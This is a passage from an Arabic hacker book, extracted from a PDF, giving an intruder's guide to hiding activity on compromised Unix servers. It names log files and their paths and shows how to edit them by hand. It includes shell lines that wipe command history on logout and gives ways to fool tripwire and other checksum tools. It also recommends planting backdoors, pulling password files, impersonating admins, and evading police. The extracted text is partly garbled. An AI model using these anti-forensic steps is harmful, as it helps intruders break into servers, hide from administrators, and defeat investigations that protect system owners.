يمكن كتابة سكريبت السي جي أي بأي لغة برمجة سواء كانت لغة مجمعة مثل الفيجوال بيسك

أو لغة مترجمة مثل البيرل و الفرق الوحيد بين نوعين اللغات أن البرنامج

المبرمج باللغة المجمعة سوف يكون أسرع في التنفيذ و لكن اللغات المترجمة أسرع في عملية التطوير

للسكريبت اذا أردت أن تعمل علي تعديل السكريبت أو تطويره

75

Page 76: 30872174-Full-Book-in-Hacker-s-كتاب-كامل-عن-الهكرز

أهم الوامر التي تعتبر وثيقة الصله لموضوعنا هي كالتالي :

1 -GETهذا المر يقوم بطلب بيانات من السيرفر للمتصفح

2 -POSTهذا المر يطلب من السيرفر قبول المعلومات المدخلة اليه من المتصفح

3 -PUTهذا المر يطلب من السيرفر قبول المعلومات المرسله اليه كبديل عن المدخلت الموجودة حاليا

) نقاط الضعف2(

نقاط الضعف التي يسببها سكريبت السي جي أي ليس ضعفا في السي جي أي نفسه و لكنه

أو في أنظمة التشغيل المختلفةHTTPضعف في بروتوكول الـ

السي جي أي يسمح باستغلل نقاط الضعف الموجودة و لكن هناك طرق أخري للوصول الي تحطيم النظام

.TELNET أو FTPالمني . كمثال يمكن الوصول الي الملفات الغير محمية باستخدام الـ

انتهى،،،

" كيف تحمي نفسك وتخفي أفعالك؟!"

<ةةةةة ةة ةةةةة ةةةةة>

<ةةةةةة: ةةةةةة>

مقدمه بسيطه : ==========

في البدايه و قبل كل شئ ارجو منكم تحمل اخطائي سواء كانت نحويه او املئيه .. كل ما اسعى له هو تعميمالفائده على الجميع

و ان نتقدم نحن العرب و نترقي باعل المستويات و المكانات الي نستحقها .. الموضوع ليس صغير و ليس بسهل في القراءه .. ارجو ان تكون صبورا متانيا حتى اخر الموضوع

76

Page 77: 30872174-Full-Book-in-Hacker-s-كتاب-كامل-عن-الهكرز

هذا الموضوع سيجعلك تخاف من خيالك و تعمل الف حساب لظلك .. لكن انشاله سيكون دفعه للمام و ليسلن تخاف و تتراجع

اسلوب الموضوع غريب .. و عادة ما نتجنبه دائما .. بمعنى اخر .. كل من اخواننا و اساتذتنا من كتبوا log filesدروسا و شروحا في اختراق السيرفرات و المواقع كان همهم الوحيد في الحمايه هو مسح اللوق

.. لكن هل هذا يجعلك في امان تام ؟! هل هذا سيمنع تتبع اثرك ؟!! هذا ما ستكتشفه بعد النتهاء من قراءةالموضوع ..

************************ ) باسرع ما يمكن هو ما يجعلك محترفا وexploitesاذا كنت تظن ان الحصول على ترجمة الثغرات (

متطورا فاسمح لي بان اقول لك " انك انسان خاطئ و ان اسلوب تفكيرك غلط " ) عندما يتم القبض عليك اذا هاجمت احدى السيرفرات الكبيره .. ؟0dayماذا ستفيدك الثغره الحديثه جدا (

و عندها سيتم السيطره على اجهزتك و ادواتك و مراقبتك !؟! يمكن يرى البعض ان هذا لم بحدث قط لي شخص نعرفه ؟ او ان بلدنا ليس فيها هذه التقنيات العاليه !! لكن

هذا قد يحدث يوم ما !! و ايضا انت لتهاجم فقط سيرفرات بلدك انما سيرفرات اخرى عالميه محميه من قبل الشرطه الدوليه .. كما

بمعنى الكلمه hackerانه لبد من الحرص و فهم المور اذا كنت تريد ان تسمي نفسك هكر ربما تعتقد في نفسك انك اكبر من قراءة هذا الموضوع بكثيير لنك من المعروفين عنهم بالحتراف او انك

ترى ذلك في نفسك .. لكن انا اؤكد لك بانك مخطئ و انت تحتاج لقراءة الموضوع الي النهايه ************************

اجزاء : 8الموضوع مقسم الى =================

الجزء الول : المقدمه ( و هو ماقد قمت انت بالنتهاء من قرائته حاليا ) " هذا الجزء سيتم عرضه من خلل هذهParanoidالجزء الثاني : المور العقليه و كيف تصبح **"

المواضيع : - الدافع او الحافز

" Paraniod- لماذا ان لبد ان تصبح " " ؟ Paranoid- كيف يمكن ان تصبح "

- و كيف تحافظ على اسلوبك الجديد او شخصيتك الجديده ؟!

** متاكد ان معظمكم يتسائل عن معنى هذه الكلمه .. سيتم توضيح معناها و مفهومها مع شرح هذا الجزءانشاله .

الجزء الثالث : الساسيات التي يجب عليك معرفتها قبل ان تقوم باي عملية اختراق ( و سيتم عرضها منخلل النقاط التاليه )

- تمهيد - امن نفسك

- حسابك الخاص LoGs- ملفات اللوق

- ل تترك اي اثر - امور و اشياء يجب تجنبها و الحظر منها

الجزء الرابع : التقنيات الحديثه الي يتي يجب ملحظتها ( و سيتم عرضه من خلل النقاط التاليه ) - تمهيد

- امنع تقفى اثرك من اي نوع مهما كان فيها من تلعب .. lOGs- ايجاد اي نوع من انواع ملفات اللوق

syslog configuration and logfile- تحقق من - تحقق من نوعيات برامج المن المثبته

Admins- تحقق من وجود المدراء checksum checking software- كيف يمكن تصحيح

- حيل المستخدم المنيه

الجزء الخامس : ماذا تفعل ان وضعت تحت المراقبه الجزء السادس : ما الذي عليك القيام به و ايضا الذي لبد من عدم القيام به في حالة انه تم القبض عليك

77

Page 78: 30872174-Full-Book-in-Hacker-s-كتاب-كامل-عن-الهكرز

الجزء السابع : قائمه بافضل البرامج للتخفي و الختباء الجزء الثامن : كلمه ختاميه ........ ارجو ان تتابعو الموضوع بحرض و تركيز شديدن من الن ... !!!

************************الجز الثاني : =======

- الدافع و الحافز : *************

لبد من تحكيم العقل للنجاح في اي عمل .. العقل هو القوه التي ستدفعك و تحفزك لتصبح انسان واقعي ..مسئول و حريص

) الناجح لبد و ان تتوفر فيه هذه المبادىء و المكانيات العقليه .. مثلها مثل بناءHackerالمخترق ( عضلت الجسم لن يكبر الجسم و يتقسم ال بعد ممارسة الرياضه الخاصه بذلك ( على سبيل المثال )

مهما كنت متمرس او لديك الكثيير من المعلومات لبد اخذ اشد الحتياطات و الحذر قبل القيام باي شئ

" ؟Paranoid- لماذا يجب ان تصبح " ***************************

" في اللغه النجليزيه تعني جنون الرتياب ( نزعه عند الفراد تجعلك تشك في جميعParanoiaكلمة " المور و جميع الشخاص )

اعتقدان المور بدات تتضح لنا بعد معرفة اصل هذه الكلمه .. تعني ان تصبح شديد الحذر و الشك فيparaniodيمكن ان نلخض ما ذكر من خلل الكلمات التاليه :

جميع الظروفلماذا يجب توخي الحذر بهذه الطريقه المخيفه ؟!!

لن توقعك دائما الى اسوء الظروف يجعلك تسير في امان .. و لن ما تفعله هو شئ كبيير جدا .. ما تراه انت بعينك المجرده انك تغير الصفحه الرئيسيه .. او تقوم بتحميل بعض المعلومات من السيرفر هو شئ بسيط بل

و سهل جدا ماذا لو انك اخترقت سيرفر معين و تم رصدك و تتبعك و القبض عليك من قبل الشرطه !؟! و انك سترمى في

السجن كالسارقين و المجرمين ان كنت ل تهتم بما قد يحصل لك .. عليك الهتمام بما ما قد يصيب اهلك .. ابوك ... امك .. اخوتك .. زوجتك

و اطفالك ( ان كنت متزوج ) ربما لتشعر بان ماتقوم به هو جريمه .. لكن في الحقيقه هي جريمه !!

هل تعرف ماذا سينتظرك ان تم القبض عليك ؟! سيتم حرمانك من كل امور الكومبيوتر .. نظرة الناس الغيير طبيعيه لك ( ليست نظرة اعجاب انما نظرة خوف ) .. لن تحظى بفرص العمل التي تستحقها .. ستسدعى عند حصول اي مشاكل اخرى من هذا النوع .. لذا فان

معظم من يسقطون ل يقومون ثاني ابدا !!

لذا فاصبح حذرا جدا و شكاكا .. امن نفسكاخذ جميع الحتياطات

لتهتم بما قديقوله الكثيرون عنك بانك خواف او ما شابه مهما كانت قيمته تافهه logاهتم باي ملف

%100 عليك ان تقوم بعملك .. سليما hackerلتصبح

" ؟Paranoid- كيف تصبح " *********************

" لكن القتناع وحده لParanoidاذا كنت قرأت ما سبق و اقتنعت به انت بالفعل اصبحت هذا الشخص " يكفي و التحمس وحده وليد اللحظه ايضا ليكفي ... انما لبد ان يكون القلق و التوتر موجودين بشكل دائم

في حياتك ( اللكترونيه ) اذا كنت فعل تريد ان تكون هكر حقيقي ... لبد ان تعرف لمن تقول هذه الحقيقه و كيف تتعامل مع الخرين ..

اعمل حساب انك مراقب دائما و انه هناك كاميرا خفيه وراك دائما .. فاحذر في كلمك على الهاتف لنه قديكون مراقب .. او حتى بريديك الشخصي و اللكتروني ( لبد ان تعمل حساب الغير المتوقع )

78

Page 79: 30872174-Full-Book-in-Hacker-s-كتاب-كامل-عن-الهكرز

اذا ما قد ذكرته ل يهمك و انك انسان غير مبالي .. دعني اسألك هذه السئله ؟ هل تريد ان يراك الخرين مجرم ؟ هل تريد ان ترى الحزن و الدموع على وجه اهلك ؟ هل تريد ان تحسر

قلوبهم عليك ؟! هل تريد ان تفقد اصدقائك ؟ خطيبتك ؟ صحبتك ؟

تذكر ان الضرر لن يعود عليك فقط انما سيعود على كل من تعرفه

- و كيف تحافظ على اسلوبك الجديد او شخصيتك الجديده ؟!******************************************

بما انك قد استوعبت ماذكر حتى الن و قررت ان تكون انسان حريص جدا .. لبد ان تبقى هكذا طوال الوقت و تذكر هذه الكلمات : لحظة كسل واحده في اتخاذ الحتياطات المنيه قد تغير حياتك باكملها ؟!!!!

دائما تذكر الدافع

- الجزء الثالث :=========

- تمهيد ******

يجب معرفة هذه المور القادمه و استيعابها جيدا قبل ممارسة اي عملية اختراق .. حتى لو كنت مخترقمتمرس لبد ان تستوعب الفكار القادمه

- امن نفسك : ***********

رسائلك البريديه اللكترونيه ؟ SysAdmin- ماذا لو قرأ ال - ماذا لو كانت اتصالتك الهاتفيه مسجله و مراقبه من قبل الشرطه ؟

- ماذا لو تم ضبط الكومبيوتر الشخصي و السيطره على كل معلوماتك ؟

اذا كنت لتقوم بعمل اي اتصالت هاتفيه مع اي شخص من الهاكرز او الكراكرز .. ول تبعث اي ايميلت فيه معلومات مشبوهه و ل تمتلك اي معلومات امنيه و حساسه على جهازك فهذا ببساطه ل يشكل اي خوف لنه

=)hackerببساطه ايضا انت لست مخترق او لنه لبد من وجود اتصال بينك و بين اصدقائك المهتمين بهذا المجال .. لتبادل الخبار و الفكار ..

كما انه لبد و انك تمتلك بعض الملفات اللزمه للختراق او بعض المعلومات الي تعبر مدينه لك في حالةحدوث رصد لجهازك ( كبسه )

--><--

sensitive dataقم بتشفير كل ما تملكه من معلومات حساسه يمكنك ذلك باستخدام بعض البرامج الموجوده مجانا على النترنت .. و هذه قائمه بافضل البرامج و التي

تعتبر اختيار الهاكرز الول : SecureDrive 1.4b او SFS v.17 اليكم MsDos- لمستخدمين

( * احدى انظمة التشغيل غير شائعة الستخدامEnigmaII v1.5* اليكم Amiga- لمستخدمين نظام خصوصا في عالمنا العربي )

CFS v1.33 اليكم Unix- لمستخدمين انظمة ال

لتشفير الملفات بشكل فردي ( ملف بملف ) اليكم هذه البرامج ( الكثر شهره و الحسن اداء ) :

-Triple DES -IDEA -Blowfish (32 rounds( -file2file

لتشفير اليميلت :

79

Page 80: 30872174-Full-Book-in-Hacker-s-كتاب-كامل-عن-الهكرز

-PGP v2.6.x

( على اساس انه ممكن ان تكون مراقب ) Unix Systemيمكنك ايضا تشفير عملية اتصالك ب و ذلك باستخدام :

-SSH المن حتى الن -DES Login

اجعل كلماتك السريه صعبة التخمين .. غير منطقيه .. غير شائعه .. ل توجد في القواميس .. لكن في نفسالوقت لبد ان تتذكرها دائما

اخترها من كتاب تتمتلكه .. اجعلها اكبر عدد ممكن من الحرف ( يعني عادة عند عمل اي اشتراك يطلب منك حروف8 احرف ) فاختر ال 8 -4كلمه سريه تتكون من

ل تحفظ ارقام هواتف اصحابك الهاكرز بشكل اعتيادي .. انما يمكنك بان تشفرها ( حتى برموز تفهمها انتفقط ) و اتصل بهم من هواتف الشارع او من العمل ..

اذا انت بالفعل متعمق جدا في الهاكينج فلبد من تشفير كل شئ يتعلق بهذه المور !! و بالطبع تكون مشفره حتى اذا خسرتHD او CDاحفظ دائما نسخه احتياطيه من معلوماتك على

المعلومات الموجوده على جهازك يكون لديك نسخ احتياطيه او ملفات مطبوعه و ل تريدها مرة اخرىdocument filesلتحتفظ بملفات لتحتاجها .. و ان كان لديك

لتقطعها اعتياديا انما احرقها في مكان بعيد كل البعد عن اماكن تواجدك العتياديه او ان اردت الحتفاظ بهافعليك كتابتها من جديد باسلوب مرمز او مشفر ليعرفه ال انت !!

هل تعرف انه من الممكن ان : =================

تكون مراقب من : الشرطه , المخابرات , هاكرز اخرون و انهم يتسطيعون رصد كل حركات باستخدام وسائلحديثه ليمكن تخيلها

مثل : - اجهزه تصوير تستطيع تصويرك عند بعد مئات المتار - نقطة ليزر مصوبه نحو غرفتك للتصنت على مكالماتك

!!keyborad- موجات عالية التردد للتنصت على لمسات و صوت يديك على ال تختلف بالطبع هذه المكانيات من مكان لخر و من دوله الى اخرى .. و يرى البعض انه فيما اقوله

مبالغه !!! لكن انت ل تعرف ماذا يخبئ لك المستقبل !! فلماذا لتستعد من الن !!! كما انه هناك الكثيير من اخواننا العرب في دول الخارج الذي بالفعل تتوفر فيها اجهزة التنصت هذه ... و على راي المثل المصري " امشي عدل يحتار عدوك فيك " فكلما كنت احتياطيا و حركاتك تحسبها بشكل

صحيح !!! ففرص اطاحتك قليله جدا

حساباتك و اشتراكات الشخصيه : ===================

هنا سأتكلم عن حساباتك الشخصيه سواء كانت في العمل\المدرسه\الجامعه\اي كان فعليك بالتالي : - ابدا ل تقوم باي عمل غيير قانوني .. او مشبوه بحسابتك الشخصيه التي فيها يكون اسمك الحقيقي و

هويتك و تفصيلت كامله عنك telnet- عمرك ما تحاول ان تتصل بموقع قد تم اختراقه بواسطة ال

من دون خوف .. security- يمكنك الشتراك بحسابك الخاص في قائمة البريد لي موقع امني - لكن كل مو هو مختص بالهاكينج من ملفات لبد ان تشفر او انها يتم مسحها فورا

- ابدا ل تحفظ اي برامج و ادوات الختراق على الهارديسك في حسابك الشخصي- بريدك الحقيقي لتعطيه ال لمن تثق فيه ثقه عمياء !!!!

- اهتمامك بالسكيورتي ل يجعلك مشبوها .. انما الهتمام بعكس السكيورتي هو المشكله ==> الهاكينج

----> : LoGSملفات اللوق

============

80

Page 81: 30872174-Full-Book-in-Hacker-s-كتاب-كامل-عن-الهكرز

ملفات مهمه جدا : 3هناك -WTMP ) للتسجيل عند الدخول و الخروج log on/off - log in/logout + tty + host ( -UTMP! للمتواجدين اونلين حاليا -LASTLOG تسجيل من اين جاءت هذه logins

** سنتكلم عنهم باستفاضه و تعمق فيما بعد ( في جزء اخر من نفس الموضوع )

يتم تسجيلها في هذه الملفات .. لبد حذف دخولك منtelnet , ftp , rloginكل عملية دخول بواسطة ال هذه الملفات و ال سيتم معرفة التي :

- ماذا قمت بالختراق !! - من اي مكان انت قادم

- كم من الوقت بقيت اونلين ..

% مننا ( حتى انا كنت اقع في نفس هذا الخطا زمان .. لكن اتعلمت ) و99.9خطا يقع فيه الجميع بنسبة logfilesهو انك تمسح اللوقات

علطول .. هذا مجدي في حالة انك لتهتم بان يعرف الدمين انه هناك مخترق ما قد دخل على النظام .. اما اذا اردت ان تشتغل شغل المحترفين عليك الدخول و الخروج دون ان يلحظك اي شخص .. دون ان تقوم بتغيير

اي شئ يلفت انتباه مدير النظام و لعمل ذلك تابع معي :

لتعتمد البرامج التي روجت على انها لتقوم بمسح اللوق انما تقوم بحذف دخولك فهي غيير مجديه مثلZAP (or ZAP2برنامج

لنه يقوم بعمل اصفار كاخر لوق مكانك انت و هذا ايضا دليل على وجود خطا سيلحظه مدير النظام اذا عليك بالقيام بذلك يدويا ..

( باستثناء بعض التوزيعات القديمه جدا ) log files لتغير و تعدل في ال rootعادة لبد ان تكوت ( تختلف باختلف التوزيع ) defaultاماكن تواجد ملفات اللوق

UTMP : /etc or /var/adm or /usr/adm or /usr/var/adm or /var/logWTMP : /etc or /var/adm or /usr/adm or /usr/var/adm or /var/log

LASTLOG : /usr/var/adm or /usr/adm or /var/adm or /var/log$home/.lastlogو في بعض النسخ القديمه

ل تترك اثرا :=======

كثيير من الهاكرز ينجحون في عملية حذف دخولهم من ملفات اللوق .. لكنهم ينسون امرا هاما و قاتل !!! وهي الملفات التي توجد هنا

/tmp and $HOME$ مصدر قلق كبيير :HOME في Shell Historyو جود ال

History files: sh : .sh_history

csh : .historyksh : .sh_history

bash: .bash_historyzsh : .historyBackup Files:

dead.letter, *.bak~* , : History filesلكن الحل موجود ايضا لمسح ال

mv .logout save.1echo rm -rf .history>.logout

echo rm -rf .logout>>.logoutecho mv save.1 .logout>>.logout

81

Page 82: 30872174-Full-Book-in-Hacker-s-كتاب-كامل-عن-الهكرز

- امور و اشياء يجب تجنبها و الحظر منها======================

كما عليك دائما انت تحذر من استخدامencrypted partitionلتقوم ابدا بكسر اي باسورد ال على اشتراكاتك ( اشتراك الجامعه على سبيل المثال )

و من ثم سيعرف مالذي تقوم به و الملفاتadminلنه بمنتهى البساطه يمكن ان يرى ماتفعله مدير الشبكه التي تستخدمها الخ ..

حاول دائما ان تغيير اسامي البرامج المشبوهه لديك يعني احنا العرب خصوصا غاويين نسمي اسماء اساميمخيفه على الفاضي ..

التي تسمح بالعمل الخلفيshellsلتفكر في نفسك فقط .. يعني حين ان تستخدم بعض الشتراكات او الbackground !!! لبد ان تعرف انك تبطئ من سرعة السيرفر و بالتالي تلفت النظار

على قدر المستطاع ... على سبيل المثال اذا اردت ان تتصل من الشيلparametresحاول ان لتستخدم telnet http://www.host.com/ 23على تيلنت لموقع معين او سيرفر معين لتقوم بعمل التي :

انما ببساطه اتبع الخطوات البطيئه و هيtelnetopen

http://www.host.com/و هكذا ..

مخصصه لنظام التشغيل ( مشbackdoorsفي حالة انك اخترقت سيرفر معين من الفضل ان تضع عليه sub7 هههههههههه ) و هي كثييره و موجوده مجانا على النترنت

الجزء الرابع : التقنيات الحديثه الي يتي يجب ملحظتها ===============================

- تمهيد*******

و خططت لبدا الختراقات .. عليك ان تعرف كيف تستخدم هذه التقنيات متعبا ماsnifferبعد ان ثبت اول يلي :

- امنع تقفى اثرك من اي نوع **********************

و انك اطحت باحد المواقع لكن هذا ليهم ...hackerقد يلحظ الدمين ( مدير الشبكه ) وجودك كمخترق المهم هو انه كيف سيرصدك و عندها كيف يمكن ان يتعامل معك !!!

لذا ففي هذا الجزء سيتم توضيح كل الحتمالت و الساليب الذي يمكن بها تتبعك و رصدك و ايضا كيف يمكنان تمنعها ...

) معرفة النظام الذي كان المخترق عليهadmin* من الطبيعي ( العادي ) ان يسهل على مدير الشكبه ( عند دخوله على شبكته و ذلك اما عن طريق ملفات اللوق ( هذا ان كان الهاكر غبي لتركها كما هي ) او من

sniffer من ال outputال online في حالة ان المخترق مازال موجودا netstatاو من اوامر

!! GateWay Serverمن اجل هذا تختاج ال

*A gateway server in betweenهذا واحد من الكثيير من السيرفرات التي يوجد لك حساب عليها و التي تعتبر في منتهى السخافه في الستخدام و انت تحتاج لن تكون رووت عليها لتستطيع تغيير ال

wtmp and lastlogs و ان تبدل بينهم باستمرار حتى ل يتم الكشفgateway serverكما انه لبد ان من استخدام اكثر من

عنك .. و من ثم تتصل بالسيرفر المرادgateway serverمن الشيل الذي ستخترق منه .. قم بالتصال بال

اختراقه .. لتغيير اللوق ) root access==> ( تحتاج دائما ل

يجنبك الكثيير من المشاكل .. حيث انك في غنى عن التعديل في ملفاتDialup serverباستخدامك ل =) hacked systemاللوق بشرط ان تدخل باشتراك مختلف في كل مره تدخل فيها على ال

hacking كثييره فل حاجه لن تستخدم dialupملحوظه : اذا كنت قادر على التصال بسرفيرات

82

Page 83: 30872174-Full-Book-in-Hacker-s-كتاب-كامل-عن-الهكرز

server لنه سيتغير اثرك بتغير الشركات المختلفه التي تتصل من خللها

بالنسبه للمتواجدين في الوليات المتحده المريكيه و اوروبا ( الدول المتقدمه ) حتى و ان قمت بما سبق (dialup servers ! يمكنهم تسجيل كل اتصال تم و لديهم ارشيفات منذ سنيين هذا عددها (

نتيجه و اختصار للنقطه السابقه موضحه بالرسم في الصوره التاليه :

مهما كان فيها من تلعب ..lOGs- ايجاد اي نوع من انواع ملفات اللوق **************************************************

*** من الهام و الضروري جدا ان تعثر على كل ملفات اللوق حتى المخفي منها .. للحصول و العثور على هذه

الملفات يمكن ذلك بهاتين الطريقتين : List Open هو اختصار LSOF - اعثر على جميع الملفات المفتوحه : و يمكنك ذلك باستخدام برنامج 1

Files و من ثم يمكن العثور عليهم و التعديل فيهم - ابحث عن كل الملفات التي تغيرت ( حدث فيها تغيير ) من بعد دخولك - 2

" find / -newer /tmp/check -print و بعدها قم "touch /tmp/checkبعد دخولك قم بعمل العمليه التي سنقوم بها ستاذخ الشكل التالي : بحث -> نتائج -> مطالعة النتائج -> تعديل

/ var/log/ و var/adm/ و usr/adm العتياديه log filesقم ايضا بالتشيك على اماكن ال فانت هنا في مازق .. حيث انه لبد من انxx@loghost يعني loghostاذا يتم تسجيل العمليات في ال

لتعدل ملفات اللوق loghostتخترق ال او قم بعد اسطرtext editor بعدة طرق ابسطها باستخدام اي محرر كتابه logfilesيمكن تعديل اللوق

"head -LineNumbersMinus10 اسطر من خلل : "10 و من ثم حذف اخر wcالملف باستخدام ) head منه- 10بالعربي ( عدد السطور مطروحا

acct-cleaner from مثبت على السيرفر يمكنك ببساطه استخدام accoutingاذا كان برنامج zhart و هو هيعمل اللزم

ايضا فمع السف عزيز انت في ورطه !!! فانا على اعرف ايutmpx و wtmpxاذا كان النظام يستخدم برنامج للتعامل في هذه الحاله .. لو استطعت ان تبرمج واحد ( للخوه المبرمجين ) ل تنسى ان تعلنا به =)

syslog configuration and logfile- تحقق من ************************************

لتسجيل اي شئ يريدونه .. فعليك ان تتحقق منsyslog functionتعتمد معظم البرامج على ال syslogخصائص ال

اخرى ... فيؤسفني انك لبد من اختراقhosts لتخزن فقط على الجهاز انما على logsفاذا كانت اللوقات hostsهذه

/etc/syslog.conf موجود في syslogملف ال

83

Page 84: 30872174-Full-Book-in-Hacker-s-كتاب-كامل-عن-الهكرز

- تحقق من نوعيات برامج المن المثبته******************************

توجد العديد من برامج الفحص المني غالبا على المواقع ذات الحس المني العالي. وتدار هذة البرامج / وvar/spool/cron/crontabs و يكون مكانها الفتراضي أو الطبيعي هو cronبواسطه أداه تسمى

و الملفات التي يستعملها. للتحقق اللسريع منRootهي تقوم بمتابعه جميع المدخلت . خاصه الـالموضوع نستخدم المر التالي

"crontab -l root." /~ الخاصbinغالبا ماتكون هذه الدوات محمله و عامله على حساب المدير. و يكون بعضها في مجلد الـ

موضوع لغراض امنيه في نفس المكان.sinneferبه. كما يمكن ان يكون هناك من الدوات الت تستعمل في مثل هذه الفحوصات الداخليه

tiger, cops, spi, tripwire, l5,binaudit, hobgoblin, s3 etc.

ينبغي على المقتحم أن يتأكد من وجود هذه الدوات و التأكد من التقارير التي ترسلها , للتأكد من أنها لتكشف عمليه القتحام

يمكنك تعديل مفات هذه البرامج للتأكد من أنها لن تقوم بالبلغ عن القتحام, و يمكن تنفيذ ذلك بطريقتين: - قم بتعديل البرنامج برمجيا لكي ل يقوم بالبلغ عنك (واسعه شويه دي) أو قم بأزالته و أستعمل برنامجا

مزيفا الذي أستعملته و محاوله تحميله بطريقه أخرىback door- قد تضطر إلى أزاله الـ

Admins- تحقق من وجود المدراء ****************************

من المهم أن تجد جميع المدراء على الموقع, و تحاول معرفه الحسابات العاديه التي يتم أستخدامها.توجد عده طرق لكشف هذه المعلومات:

alias و مدخلت الـ forword- قم بفحص الملف . بنجاحsu root و حدد المستخدمين الذين نجحو في تنفيذ المر sulog-أفحص ملف الـ ,admin, root و أبحث عن جميع المجموعات التي لها علقه بالداره ( group- أسحب ملف الـ

wheel, etc بالنسبه للمدير لعرض كلمات سر المدراءpasswd-أسحب ملف

يعد كل هذا , يمكنك معرفه كل المدراء على الموقع. أدخل إلى مجلداتهم الخاصه ( في حاله عدم أستطاعتك , لنتحال شخصيه المستخدم) . و أفحص الملفاتchid.c, changeid.cأستخدم أحدى الدوات التاليه

لمعرفه الوامر التي يستعملونها عادة, قد يفيدك هذاhistory/.sh_history/.bash_historyالتاليهفي معرفه دور المدير على الموقع, أو أكتشاف معلومات مخفيه. قم بفحص ملفات .

profile/.login/.bash_profileلمراجعه أعدادات الـ aliasالتي تستخدم, و إذا ماكانت أدوات أمنيه خفيه مستخدمه. و من الطبيعي طبعا أن تقوم بفحص كافه الملفات و المجلدات , خاصه المخفيه منها قد تجد

بعض الشياء المفيده حقا

checksum checking software************************

( هو قيمة رقمية تستعمل للتأكد من خلو البيانات من الخطاء. هذه القيمة تحسب منchecksumبرامج خلل عملية كشف الجمع)

بعض المدراء ويقمون باستعمال برامج للتحقق من حدوث اي تغييرات في الملفات، وفي حالة حدوث ايتغير، يقوم بفحص الملفات ويستطيع اكتشافها

فكيف تعرف مااذا استخدمت هناك برامج التحقق واي النواع استخدمت؟ واذاعرفت فكيف تعدلها بحيث تخدممن اجلك ؟

هناك انواع عديدة من برامج التحقق ومن السهل كتابة واحدة منها بنفسك ولكن من الصعب اكتشاف ما اذااستخدمت مثل تلك البرامج علي الملفات للحماية

checksumهذه اسماء بعض البرامج التي تقوم ب عملية فحص

84

Page 85: 30872174-Full-Book-in-Hacker-s-كتاب-كامل-عن-الهكرز

SOFTWARE : STANDARD PATH : BINARY FILENAMEStripwire : /usr/adm/tcheck, /usr/local/adm/tcheck : databases, tripwire

binaudit : /usr/local/adm/audit : auditscanhobgoblin : ~user/bin : hobgoblin

raudit : ~user/bin : raudit.pll5 : compile directory : l5

كما تري هناك احتمالت كثيرة، ربما البرنامج نفسه او قواعد البيانات يوجد علي جزء آخر، مثل جزءNTFS لمضيف او جهاز آخر ، او حتي قواعد بيانات التي تحمل معلومات checksumفي جهاز محمي

مثل ) ...CDعلي الكتابة ( اقراص ولكن يمكنك القيام بعملية فحص استطلعي سريع لمعرفة البرامج المستخدمة ، واذا لم تستخدم ففرصتك، واذا لم تجد شي ولكنك كنت متاكدا من استخدامهم لتلك النواع من البرامج هذا يعني ان الموقع او المزود

محمي بشكل جيدا ( هارد لك ) ويجب ان ل تعبث بالملفات ابدا ..

ولكن ماالعمل اذا اكتشفت انهم يستخدمون تلك البرامج وبامكانك تغييرها؟؟ - ايهام تلك البرنامج بطرق شرعي بانه تم تغيير ملف ما بشكل قانوني ويتم تحديث قواعد البيانات1يمكنك ".tripwire -update /bin/targetمثل "

- يمكنك تغيير قائمة الملفات التي يجب فحصها وتزيل اسم الملفات المراد من القائمة فل يتم فحصها مرة2 checksumاخري للتحقق ( ولكن يجب ان تتاكد ايضا ان ملف قواعد البيانات نفسها ل يتم فحصها ب

حتي ل يتم اكتشاف التغييرات التي قمت بها )

- حيل المستخدم المنيه *******************

هذه الحيل ما ندر توجد او تستخدم لكنني كتبتها فقط لكون شملت كل شئ ( لكمال الموضوع ) .. فبعض و بالطبع ل يريدون ان يعبث في ملفاتهم اي شخص فيقومونadminsالمستخدمين يسمون اشتراكاتهم profile, .cshrc, .login, .logout لذا فدائما تحقق من .startupبعمل بعض الحيل في ملفات ال

الخ ( اي الملفات التي تبدا بنقطه )

الجزء الخامس :=========

ماذا تفعل ان وضعت تحت المراقبه؟***************************

عليك القيامadministratorsمتى اصحبت تحت الميكروسكوب ( المراقبه ) من قبل الشرطه او حتى البخطوات هامه و سريعه حتى ليستطيعو المساك بدليل ( برهان ) عليك

فانت ==> مذنب حتى تثبتhacker انك administrators- ملحوظه : ان كان في اعتقاد ال براته ...

و الhacker ( بعض الوقات اعتقد انه ل يوجد فرق بين ال adminsليعني القانون اي شئ لل administrator ال بان مالك الكومبيوتر هو ال administratorفقط ) عندما يعتقدون انك هاكر فانك

فورا اصبحت مذنب .. سيقومو مباشرة بمراقبة بريدك اللكتروني و ملفاتك و ان كان محترف الدمينسيرصدك ايضا هجماتك الخرى ..

اذا كان يمكنهم مراقبة كل هذه التصالت اكيد ببساطه يمكنهم مراقبة خط تيليفونك .. لذا فعليك عدم القيام باي اتصالت فيها اخبار اخترقاتك .. و ان حتى اردت ان تحذر اصحابك فل تخبرهم هاتفيا او ببريد الكتروني ( ال اذا كان مشفرا) و من الفضل ان تخبرهم عندما تقابلهم وجها لوجه .. و

تمنعهم من راسال اي رسائل غيير عاديه .. لتؤمن نفسك عليك ان تبقى على هذا الحال على القل من شهر الى شهرين .. و ال ستواجه مشاكل اعتقد انك

85

Page 86: 30872174-Full-Book-in-Hacker-s-كتاب-كامل-عن-الهكرز

لترغب بها

الجزء السادس :=========

ما الذي عليك القيام به و ايضا الذي لبد من عدم القيام به في حالة انه تم القبض عليك:**************************************************

************** اول : اطلب محاميك فورا !!!! : ل تحاول بان تتذكى انت و ترد على التحقيق بمفردك .. فاطلب محاميك كي

يدافع عنك هو و يطلعك على ما يجب ان تذكره و ما يجب ان ل تذكره نهائيا .. بعدها غالبا ما سيطلب المحامي جهازك ( الكومبيوتر ) باقصى سرعه بحجة احتياجه في العمل و ال عليهم تحميل جميع العباء

الماديه و المشاكل التي قد تحدث عن عدك استخدام الجهاز .. لذا فانه من العملي جدا ان يكون عندك محاميجاهز في اي وقت قبل ان تقع الفاس في الراس و بعدها تبدا في البحث و التدوير

ثانيا : ابدا ل تتكلم ال الشرطه !!! : لتعطي للشرطه اي معلومات عنك او عن زملئك بحجة ان هذا سيخفف العقاب عنك و سيخرجك من المازق .. لن هذا لن يفيدك بل سيدينك اكثر .. و ان كان يجب استجوابك فاطلب

ان يتم هذا فقط من خلل محاميك ( و هذا ايضا حق من حقوقك ) لتخبر ابدا عن اصدقاؤك ليس ققط كنوع من الشهامه .. انما ايضا بدخول اصحابك في الموضوع ستتسع

دائرة الموضوع و من ثم تزيد المعلومات عنك و عن جرائمك و هم ايضا ! بعض الدول من ضمن قانونها انه اذا لم تستطع الشرطه فك تشفير ملفاتك او جزء من الهارد ديسك فيمكنك

بمنتهى الحريه عدم الفصاح عنها لكن بعض الدول الخرى في قانونها انه مادامت وقعت في المصيده لبد ان تدلي لهم بكل شئ في هذه الحاله

